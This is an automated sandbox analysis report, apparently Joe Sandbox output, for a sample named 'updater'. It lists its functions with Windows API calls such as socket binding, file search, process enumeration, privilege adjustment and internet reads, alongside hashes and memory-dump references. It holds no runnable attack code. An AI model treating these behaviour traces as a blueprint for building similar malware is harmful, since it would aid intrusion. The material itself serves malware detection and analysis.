Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: ae5d25abbc21cf9e97ccefd8ba60148b14efe83d007a1ec93ed3b7efbe54898a
Instruction ID: 983b95035f119550a58ab57eb727746d997f935970eb7e56919de1b775630d51
Opcode Fuzzy Hash: ae5d25abbc21cf9e97ccefd8ba60148b14efe83d007a1ec93ed3b7efbe54898a
Instruction Fuzzy Hash: B321E4702006009FCB0AFF64DD4AA6EB7ADEF49720F118199F816AB3D1CB74AC41CB90

Function 0037C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0037C329
_wcscmp.LIBCMT ref: 0037C359
_wcscmp.LIBCMT ref: 0037C36E
FindNextFileW.KERNEL32(00000000,?), ref: 0037C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0037C3AF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: ff5b1799484b77c787a05542aa3c708db4415285f511a65326bbf3101a9ab2f2
Instruction ID: 5747528db7e4997279e7cd0c6bf7e9f6854568c0c871531463c5714de2865702
Opcode Fuzzy Hash: ff5b1799484b77c787a05542aa3c708db4415285f511a65326bbf3101a9ab2f2
Instruction Fuzzy Hash: CF51AD756046028FD72ADF68D490EAAB3E8FF49310F01861DF95A8B3A1DB34ED04CB91

Function 00386E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00388475: inet_addr.WSOCK32(00000000), ref: 003884A0

socket.WSOCK32(00000002,00000002,00000011), ref: 00386E89
WSAGetLastError.WSOCK32(00000000), ref: 00386EB2
bind.WSOCK32(00000000,?,00000010), ref: 00386EEB
WSAGetLastError.WSOCK32(00000000), ref: 00386EF8
closesocket.WSOCK32(00000000), ref: 00386F0C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: f0871c95e3c34a0352bfd4034b7b36193cde21a95b7b0cc13b4264bb83ce4220
Instruction ID: 4ed0a958702dc1af8d1e21147da4ec17edaa96cf69de81c3f38bcdd877b459ea
Opcode Fuzzy Hash: f0871c95e3c34a0352bfd4034b7b36193cde21a95b7b0cc13b4264bb83ce4220
Instruction Fuzzy Hash: B541D3B5600200AFDB16BF64DC86FAE73A89B4D714F048458F915AF3C2DA749D418BA1

Function 003959B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00395A02
IsWindowEnabled.USER32 ref: 00395A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00395A1D
IsIconic.USER32 ref: 00395A2B
IsZoomed.USER32 ref: 00395A39

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 333e452a67df656a0753395c17da5c5c858f8ecf578f61ea4c7eabd2c7ed78a0
Instruction ID: 9a2b80d8b71102f84136f3659f7a909f97775e967f5563962df40be08f1d1fa3
Opcode Fuzzy Hash: 333e452a67df656a0753395c17da5c5c858f8ecf578f61ea4c7eabd2c7ed78a0
Instruction Fuzzy Hash: 3211E7727009119FEB275F669C84A6E7B9DFF46721F014129F805D7241CB30ED818BE4

Function 0037C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0037CA75
CoCreateInstance.OLE32(003A3D3C,00000000,00000001,003A3BAC,?), ref: 0037CA8D

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

CoUninitialize.OLE32 ref: 0037CCFA

Strings

.lnk, xrefs: 0037CA09, 0037CA31, 0037CA3B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: a0e78587f3e2a4eec4df8c1d549d7d6552fa61814b3b4ae78c826760780ca139
Instruction ID: 35e10bceee2e2e98f3d40359a1b4c191a22d57133ed245b05a6e1fc85abf3510
Opcode Fuzzy Hash: a0e78587f3e2a4eec4df8c1d549d7d6552fa61814b3b4ae78c826760780ca139
Instruction Fuzzy Hash: 00A16CB1104205AFD305EF64DC81EABB7ECEF99314F00491CF5559B2A2EB70EA49CB92

Function 0038C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0035027A,?), ref: 0038C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038C6F9

Strings

GetSystemWow64DirectoryW, xrefs: 0038C6F3
kernel32.dll, xrefs: 0038C6E2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 813c1b0e2584fdd42327562c557470f902af4164d2617f14d27494c1254705f6
Instruction ID: 97caa6f1628e58d65d6259eb0604cd4cb09569a08b50e052d85c3e59b4c8c902
Opcode Fuzzy Hash: 813c1b0e2584fdd42327562c557470f902af4164d2617f14d27494c1254705f6
Instruction Fuzzy Hash: 35E08C381203028FD7226B25C849A82B6D8EB05384F41946DE8C5D2220D770D8408B20

Function 00350030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00350034
__swprintf.LIBCMT ref: 00350065

Strings

WIN_XPe, xrefs: 003500A4
%.3d, xrefs: 0035003F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: e53c05f20bccc0c0ad420bed85376ab81a0e35ecec242674cdf19c30d2a1d60e
Instruction ID: 4755004e972c68ee3556831f55ceca1819040dc1e1eeda2c7a8591ee4adb60b8
Opcode Fuzzy Hash: e53c05f20bccc0c0ad420bed85376ab81a0e35ecec242674cdf19c30d2a1d60e
Instruction Fuzzy Hash: DCD012B1848108EAC71F9A90C985EF9B37CAB08302F144452FD46E3490D336978CAB22

Function 00374148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0037416D
Process32FirstW.KERNEL32(00000000,?), ref: 0037417B
Process32NextW.KERNEL32(00000000,?), ref: 0037419B
CloseHandle.KERNEL32(00000000), ref: 00374245

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 9191f9c2f0df5a3f89fafb35957349b4af4985fd4b49fd2bc53be77fe1bc9c66
Instruction ID: f3fc8f70dda1c51f1bb39ebeccbc6572e3a7cdd35bd0d8f8f5472867275b016b
Opcode Fuzzy Hash: 9191f9c2f0df5a3f89fafb35957349b4af4985fd4b49fd2bc53be77fe1bc9c66
Instruction Fuzzy Hash: 5731C5711083519FD316EF50E885AAFBBE8FFA5350F10092DF585C61A1EB70AA49CB92

Function 0036EDB2 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0036EDC4

Strings

|, xrefs: 0036EDF4
(, xrefs: 0036EE0A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 205114b6cde0c738987e17d1b243f8fc9707b933b55248a929c85bd5c2adf839
Instruction ID: 19f7609fb949f8582595cde28c39484bcd3f36b76106632c2739be534860e287
Opcode Fuzzy Hash: 205114b6cde0c738987e17d1b243f8fc9707b933b55248a929c85bd5c2adf839
Instruction Fuzzy Hash: 3F324679A047059FC729CF19D480A6AB7F0FF48320B12C56EE89ADB7A5E770E941CB40

Function 003829BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00381ED6,00000000), ref: 00382AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00382AE4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 6e82c6d0a529bc8fb47d5ee7f542085cd251c90ffc97f3643f67624c2bae9739
Instruction ID: 3c8d618a843bd3c4390c1eff6a2543c58240565d4fa7d78e5b72fa93e10b5446
Opcode Fuzzy Hash: 6e82c6d0a529bc8fb47d5ee7f542085cd251c90ffc97f3643f67624c2bae9739
Instruction Fuzzy Hash: 0641C371604309FFEB26EE94CC85EBBB7ACEF40754F10409AF605A6181EA75AE419760

Function 0037B976 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0037B986
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0037B9E0
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0037BA2D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: bb07c50c57920d1a11ec86e9e2d6b3e68ef34a279b037b35e375e7ec5e384920
Instruction ID: 6c5ceeca60996e49524589a334fdecae8b4da9c6cec025917b0ada1ff5e8f12c
Opcode Fuzzy Hash: bb07c50c57920d1a11ec86e9e2d6b3e68ef34a279b037b35e375e7ec5e384920
Instruction Fuzzy Hash: 31217175A00218EFCB05EFA5E884EEDFBB8FF49310F1480A9E905AB351DB31A955CB51

Function 00369399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003693E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00369410
GetLastError.KERNEL32 ref: 0036941D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: ed515778b6887d2e295919a9d590fae7e7f22fb8691e4ae23700f13b991e9841
Instruction ID: 1aa4fb293ebbbb3cedbf7b60b27c931b7d48edb7b42ee99e207887bcca850000
Opcode Fuzzy Hash: ed515778b6887d2e295919a9d590fae7e7f22fb8691e4ae23700f13b991e9841
Instruction Fuzzy Hash: 67118FB1418205AFD729DF64DCC5E2BB7BCFB44710B21852EE45996250EB70AC41CB60

Function 00374254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00374271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003742B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003742BD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 88b60c5915b6d5d0c6fee885b84ac0080009b77f3f28af36d26f71daf0d29737
Instruction ID: 4886a4acd3fcca8be9ed62cebc1bbd5b79d5859aa71cef1a528e065491327687
Opcode Fuzzy Hash: 88b60c5915b6d5d0c6fee885b84ac0080009b77f3f28af36d26f71daf0d29737
Instruction Fuzzy Hash: A6118275E01228BFDB218F959C44BAFBBBCEB45B20F108555FD04E7280C6745A019BA1

Function 00374F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00374F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00374F5C
FreeSid.ADVAPI32(?), ref: 00374F6C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: af70f5351e5228533dcb6d2cf9125acd6b2049b479a92d1673d63f9d5f1d0f8c
Instruction ID: fa2685ad6d79b10612f6bce4f504d8578cd25c18995ba6350b1927fda8a8bfbb
Opcode Fuzzy Hash: af70f5351e5228533dcb6d2cf9125acd6b2049b479a92d1673d63f9d5f1d0f8c
Instruction Fuzzy Hash: D3F04975A1130CBFDF04DFE0DD89AAEBBBCEF08301F4044A9A901E2180E7346A048B50

Function 0037494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0035FC86), ref: 0037495A
FindFirstFileW.KERNEL32(?,?), ref: 0037496B
FindClose.KERNEL32(00000000), ref: 0037497B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d1cb7f207665f775828c1b9f3762ead2d3c201a3308f571825e1eb24283d0ba8
Instruction ID: 90f6a1baaba4a8809f20b34ed0c0f9b939d636e5cb7165de9e4b2d30373b3133
Opcode Fuzzy Hash: d1cb7f207665f775828c1b9f3762ead2d3c201a3308f571825e1eb24283d0ba8
Instruction Fuzzy Hash: 87E0DF31810605AB82266B38EC0D8EA775C9F07339F114B06FA39C20E0EB74AD449696

Function 003194E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005701147a99686277d2f8c9d2c422665f1838f4601ee522763de3ea79fb3d44
Instruction ID: 26af70e4f8fac4c6b0761d139c425b401d3e90b5f108dcaee2e4016691925b7e
Opcode Fuzzy Hash: 005701147a99686277d2f8c9d2c422665f1838f4601ee522763de3ea79fb3d44
Instruction Fuzzy Hash: A522CE74A04206CFDB2ADF54C4A0BEEB7B5FF49310F15816AE846AB351E334AD85CB91

Function 0037CD14 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0037CD3E
FindClose.KERNEL32(00000000), ref: 0037CD6E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f94085e8b6d6ee6301d3e0ef4b88f85a31dd7990f61727957e599298274e4d9f
Instruction ID: f6b311f6d42ec0e20ebf7a565ac09592622207ecf2ebb345de8af3bbf56da267
Opcode Fuzzy Hash: f94085e8b6d6ee6301d3e0ef4b88f85a31dd7990f61727957e599298274e4d9f
Instruction Fuzzy Hash: 9E11C8716106009FD715DF29D845A6AF7E8FF45324F00C51DF8699B291DB34AC01CB81

Function 016DA8D9 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,016DA93D), ref: 016DA8FF
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,016DA93D), ref: 016DA918

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 3ea9cf15cfc34da0ec93366f962d015636da59e606e0ed825dfc35f6dababf11
Instruction ID: dc458f4e992d1e648f44550c0ba99d1df1a527631f839ec97ca27fa70cbbb59d
Opcode Fuzzy Hash: 3ea9cf15cfc34da0ec93366f962d015636da59e606e0ed825dfc35f6dababf11
Instruction Fuzzy Hash: 9DF09675E083057BDB00DEE1CC5189DB3BBE7C9710F40C969A520D7640EA756504C654

Function 016D69BD Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,016E9424,00000000,016E9530), ref: 016D69D8
GetLastError.KERNEL32(00000000,?,?,?,?,016E9424,00000000,016E9530), ref: 016D69FD

Part of subcall function 016D6951: FileTimeToLocalFileTime.KERNEL32(?), ref: 016D6981
Part of subcall function 016D6951: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 016D6990

Part of subcall function 016D6A31: FindClose.KERNEL32(?,?,016D69FB,00000000,?,?,?,?,016E9424,00000000,016E9530), ref: 016D6A3D

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FileTime$Find$CloseDateErrorFirstLastLocal
String ID:
API String ID: 976985129-0
Opcode ID: 85bab9cfd6657be81c477965d7c9920948d62e9ac6640ead121c592b0455e55b
Instruction ID: 6dcc19675be98d52aa074993d34fd23c8abd0674394834fc33bcf84bcce1c217
Opcode Fuzzy Hash: 85bab9cfd6657be81c477965d7c9920948d62e9ac6640ead121c592b0455e55b
Instruction Fuzzy Hash: 83E092B2F021634B8714BF7EDCC049E56D99AA46B130D43BAED65DB345EE24CC0683D6

Function 0037A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00389B52,?,003A098C,?), ref: 0037A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00389B52,?,003A098C,?), ref: 0037A6EC

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
